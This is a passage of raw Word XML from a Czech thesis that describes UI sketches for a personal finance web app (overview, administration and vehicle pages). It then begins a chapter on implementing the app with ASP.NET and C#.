      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref385188725 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je celkový náčrt stránky </w:t>
      </w:r>
      <w:r w:rsidRPr="002171EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Přehled</w:t>
      </w:r>
      <w:r>
        <w:t>. V horní části je filtr pro výběr časového období, účtů a štítků. Následují tabulky s přehledem příjmů, výdajů a plánovaných transakcí, které odpovídají zvoleným podmínkám. Dále bude zobrazeno plnění aktuálních rozpočtů a veškeré statistiky, které budou vypočítané pro právě zobr</w:t>
      </w:r>
      <w:r w:rsidR="006837E8">
        <w:t xml:space="preserve">azené transakce ve formě grafů, které mohou být doplněny tabulkami. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006837E8" w:rsidRPr="000A7A88" w:rsidRDefault="006837E8" w:rsidP="000A7A88">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tato stránka bude také optimalizována pro zobrazení na mobilních zařízeních. </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref385189762 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ukazuje její zobrazení na tabletu, kdy dojde ke změně dvousloupcového rozložení na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jednosloupcové</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref385189771 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> na mobilním telefonu, kdy budou viditelné pouze ty nejdůležitější prvky určené pro evidenci transakcí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531197" w:rsidRDefault="00900DFE" w:rsidP="006837E8">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4806950" cy="3081743"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Obrázek 11" descr="prehled_tabl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hled_tablet.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4804252" cy="3080014"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRPr="00531197" w:rsidRDefault="00531197" w:rsidP="00531197">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_Ref385189762"/>
      <w:bookmarkStart w:id="157" w:name="_Toc387327918"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="156"/>
      <w:r>
        <w:t>. Náčrt stránky Přehled zobrazené na tabletu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w:rsidR="00531197" w:rsidRDefault="00900DFE" w:rsidP="00531197">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1900484" cy="3713254"/>
            <wp:effectExtent l="19050" t="0" r="4516" b="0"/>
            <wp:docPr id="13" name="Obrázek 12" descr="prehled_mob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hled_mobil.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1904077" cy="3720275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRDefault="00531197" w:rsidP="00531197">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Ref385189771"/>
      <w:bookmarkStart w:id="159" w:name="_Toc387327919"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="158"/>
      <w:r>
        <w:t>. Náčrt stránky Přehled zobrazené na mobilním telefonu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRDefault="006837E8" w:rsidP="006837E8">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc387327862"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Správa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRDefault="006837E8" w:rsidP="00704255">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V sekci </w:t>
      </w:r>
      <w:r w:rsidRPr="002171EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Správa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bude uživatel moci spravovat účty, štítky, opakované transakce, rozpočty</w:t>
      </w:r>
      <w:r w:rsidR="000540B9">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vozidla</w:t>
      </w:r>
      <w:r w:rsidR="002171EE">
        <w:t xml:space="preserve"> a svůj uživatelský účet. Také</w:t>
      </w:r>
      <w:r w:rsidR="000540B9">
        <w:t xml:space="preserve"> zde </w:t>
      </w:r>
      <w:r w:rsidR="002171EE">
        <w:t>bude mít dostupné</w:t>
      </w:r>
      <w:r w:rsidR="000540B9">
        <w:t xml:space="preserve"> funkc</w:t>
      </w:r>
      <w:r w:rsidR="002171EE">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="000540B9">
        <w:t xml:space="preserve"> pro zálohování a obnovu dat.</w:t>
      </w:r>
      <w:r w:rsidR="005A74E4">
        <w:t xml:space="preserve"> Uživatelské rozhraní této sekce bude založeno na tabulkách </w:t>
      </w:r>
      <w:r w:rsidR="002171EE">
        <w:t xml:space="preserve">zobrazujících </w:t>
      </w:r>
      <w:r w:rsidR="005A74E4">
        <w:t>uložen</w:t>
      </w:r>
      <w:r w:rsidR="002171EE">
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidR="005A74E4">
        <w:t xml:space="preserve"> objekty, jak ukazuje </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A74E4">
        <w:instrText xml:space="preserve"> REF _Ref385190415 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005A74E4">
        <w:t xml:space="preserve"> a na formulářích pro jejich vytvoření nebo úpravu, jak ukazuje </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A74E4">
        <w:instrText xml:space="preserve"> REF _Ref385190444 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005A74E4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0047324A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000540B9" w:rsidRDefault="00900DFE" w:rsidP="000540B9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5516652" cy="2004484"/>
            <wp:effectExtent l="19050" t="19050" r="26898" b="14816"/>
            <wp:docPr id="15" name="Obrázek 14" descr="spr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va.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28" cstate="print"/>
                    <a:srcRect r="47168" b="59441"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5519331" cy="2005458"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRDefault="000540B9" w:rsidP="000540B9">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Ref385190415"/>
      <w:bookmarkStart w:id="162" w:name="_Toc387327920"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="161"/>
      <w:r>
        <w:t>. Náčrt seznamu účtů v sekci Správa.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w:rsidR="000540B9" w:rsidRDefault="00900DFE" w:rsidP="000540B9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4599757" cy="2216110"/>
            <wp:effectExtent l="19050" t="19050" r="10343" b="12740"/>
            <wp:docPr id="16" name="Obrázek 15" descr="sprva_uprava_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va_uprava_tu.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29" cstate="print"/>
                    <a:srcRect r="61080" b="60435"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4598612" cy="2215558"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRDefault="000540B9" w:rsidP="000540B9">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Ref385190444"/>
      <w:bookmarkStart w:id="164" w:name="_Toc387327921"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="163"/>
      <w:r>
        <w:t>. Náčrt formuláře pro úpravu účtu v sekci Správa.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w:rsidR="0047324A" w:rsidRDefault="0047324A" w:rsidP="0047324A">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc387327863"/>
      <w:r>
        <w:t>Vozidla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w:rsidR="0047324A" w:rsidRPr="0047324A" w:rsidRDefault="0025141E" w:rsidP="0047324A">
      <w:r>
        <w:t xml:space="preserve">Stránka </w:t>
      </w:r>
      <w:r w:rsidR="002171EE" w:rsidRPr="002171EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="002171EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ozidla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C4808">
        <w:t xml:space="preserve">bude sloužit k zobrazení statistik o vybraném vozidle. Náčrt stránky je na </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008C4808">
        <w:instrText xml:space="preserve"> REF _Ref385191364 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008C4808">
        <w:t>. V</w:t>
      </w:r>
      <w:r w:rsidR="00702524">
        <w:t xml:space="preserve"> její </w:t>
      </w:r>
      <w:r w:rsidR="008C4808">
        <w:t>horní části je filtr</w:t>
      </w:r>
      <w:r w:rsidR="00702524">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008C4808">
        <w:t xml:space="preserve"> pomocí kterého uživatel zvolí časové období a vybere vozidlo. Následují tabulky s evidovaným tankováním a ostatními výdaji, které </w:t>
      </w:r>
      <w:r w:rsidR="00736F06">
        <w:t>se vztahují k vybranému vozidlu a časovému období. Dále budou na stránce zobrazeny statistiky o</w:t>
      </w:r>
      <w:r w:rsidR="00702524">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00736F06">
        <w:t>vozidle</w:t>
      </w:r>
      <w:r w:rsidR="0000241E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00736F06">
        <w:t xml:space="preserve"> jak</w:t>
      </w:r>
      <w:r w:rsidR="00702524">
        <w:t>ými</w:t>
      </w:r>
      <w:r w:rsidR="00736F06">
        <w:t xml:space="preserve"> je</w:t>
      </w:r>
      <w:r w:rsidR="00702524">
        <w:t xml:space="preserve"> například </w:t>
      </w:r>
      <w:r w:rsidR="00736F06">
        <w:t xml:space="preserve">graf výdajů za vozidlo v čase včetně vypočítaných nákladů </w:t>
      </w:r>
      <w:r w:rsidR="00736F06">
        <w:lastRenderedPageBreak/>
        <w:t>za ujetý kilometr, graf průměrné spotřeby mezi tankováním do plné nádrže, graf ceny pohonných hmot v čase a graf stavu tachometru vozidla v čase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047324A" w:rsidRDefault="00C64EF0" w:rsidP="0047324A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="4935220"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="17780"/>
            <wp:docPr id="20" name="Obrázek 19" descr="vozidl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zidla.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="4935220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00900DFE" w:rsidRDefault="0047324A" w:rsidP="0047324A">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_Ref385191364"/>
      <w:bookmarkStart w:id="167" w:name="_Toc387327922"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="166"/>
      <w:r>
        <w:t>. Náčrt stránky Vozidla</w:t>
      </w:r>
      <w:r w:rsidR="00731454">
        <w:t xml:space="preserve"> sloužící pro zobrazení statistik o evidovaném vozidle</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w:rsidR="002C1C83" w:rsidRDefault="002C1C83" w:rsidP="002C1C83">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc387327864"/>
      <w:r>
        <w:t>Grafický styl uživatelského rozhraní</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w:rsidR="002C1C83" w:rsidRPr="002C1C83" w:rsidRDefault="002C1C83" w:rsidP="002C1C83">
      <w:r>
        <w:t xml:space="preserve">Uživatelské rozhraní bude vyvedeno v graficky jednoduchém stylu za použití design </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameworku</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Bootstrap</w:t>
      </w:r>
      <w:r w:rsidR="002057FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13469171"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION LJxnBPZxgc8PiHBo \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[18]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00DC4E46">
        <w:t>. Konkrétní vzhled aplikace bude doladěn v průběhu vytváření prototypu, nicméně schéma uživatelského rozhraní by se již měnit nemělo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00F3033A" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_Toc387327865"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Návrh implementace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w:rsidR="00676CAF" w:rsidRDefault="00BD58A3" w:rsidP="00676CAF">
      <w:r>
        <w:t>Navrhnutá</w:t>
      </w:r>
      <w:r w:rsidR="00676CAF">
        <w:t xml:space="preserve"> aplikace </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pro správu financí </w:t>
      </w:r>
      <w:r w:rsidR="00676CAF">
        <w:t xml:space="preserve">bude implementována jako webová aplikace, půjde tedy o serverovou aplikaci, ke které budou uživatelé přistupovat prostřednictvím webového prohlížeče. </w:t>
      </w:r>
      <w:r w:rsidR="006D75D6">
        <w:t>K implementaci takového řešení je dnes možné přistoupit z různých úhlů pohledu a s použitím mnoha dostupných technologií a programovacích jazyků. V této kapitole budou mimo jiné popsány technologie, které navrhuji při implementaci použít a</w:t>
      </w:r>
      <w:r w:rsidR="0000241E">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="006D75D6">
        <w:t xml:space="preserve">bude u nich zmíněno proč. </w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="006D75D6">
        <w:t xml:space="preserve">ude </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">také </w:t>
      </w:r>
      <w:r w:rsidR="006D75D6">
        <w:t>nastíněno, jakým způsobem provést implementaci tak, aby se vyloučily zranitelnosti uvedené v</w:t>
      </w:r>
      <w:r w:rsidR="0000241E">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="006D75D6">
        <w:t>kapitole</w:t>
      </w:r>
      <w:r w:rsidR="0000241E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0000241E">
        <w:instrText xml:space="preserve"> REF _Ref383961674 \w \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006D75D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006D75D6">
        <w:instrText xml:space="preserve"> REF _Ref383961674 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>Zabezpečení webových aplikací</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006D75D6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009808C4" w:rsidRDefault="008D1BE9" w:rsidP="009808C4">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc387327866"/>
      <w:r>
        <w:t>Použité technologie a knihovny</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p w:rsidR="009808C4" w:rsidRDefault="009808C4" w:rsidP="009808C4">
      <w:r>
        <w:t xml:space="preserve">V této podkapitole budou popsány použité </w:t>
      </w:r>
      <w:r w:rsidR="008D1BE9">
        <w:t xml:space="preserve">serverové a klientské </w:t>
      </w:r>
      <w:r>
        <w:t>technologie</w:t>
      </w:r>
      <w:r w:rsidR="008D1BE9">
        <w:t xml:space="preserve"> a knihovny</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009808C4" w:rsidRDefault="009808C4" w:rsidP="009808C4">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc387327867"/>
      <w:r>
        <w:t>ASP.NET</w:t>
      </w:r>
      <w:r w:rsidR="001F727E">
        <w:t xml:space="preserve"> a C#</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w:rsidR="00676CAF" w:rsidRDefault="00C401F1" w:rsidP="001F727E">
      <w:r>
        <w:t xml:space="preserve">Platformu .NET a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pro webové aplikace ASP.NET společnost Microsoft uvedla již v roce 2002 a od té doby </w:t>
      </w:r>
      <w:r w:rsidR="00261982">
        <w:t>je</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> neustále vyvíjí. Velkou výhodou </w:t>
      </w:r>
      <w:r w:rsidR="00785676">
        <w:t>ASP.NET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameworku</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> je právě podpora </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Microsoftu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a velk</w:t>
      </w:r>
      <w:r w:rsidR="00BD58A3">
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> komunit</w:t>
      </w:r>
      <w:r w:rsidR="00BD58A3">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vývojářů. Každá </w:t>
      </w:r>
      <w:r w:rsidR="00CC5633">
        <w:t xml:space="preserve">jeho </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nová verze </w:t>
      </w:r>
      <w:r w:rsidR="00261982">
        <w:t>rozšiřuje nabídku již implementovan</w:t>
      </w:r>
      <w:r w:rsidR="009E70A8">
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidR="00261982">
        <w:t xml:space="preserve"> často používané funkcionality</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00261982">
        <w:t>díky čemuž se mohou vývojáři stále efektivně</w:t>
      </w:r>
      <w:r w:rsidR="00CC5633">
        <w:t>ji</w:t>
      </w:r>
      <w:r w:rsidR="00261982">
        <w:t xml:space="preserve"> zaměřovat na řešený problém především z obchodního hlediska namísto </w:t>
      </w:r>
      <w:r w:rsidR="00CC5633">
        <w:t xml:space="preserve">implementování již stokrát implementovaného. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821537"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION yLEK3MrsDlJi2uxG \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[19]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
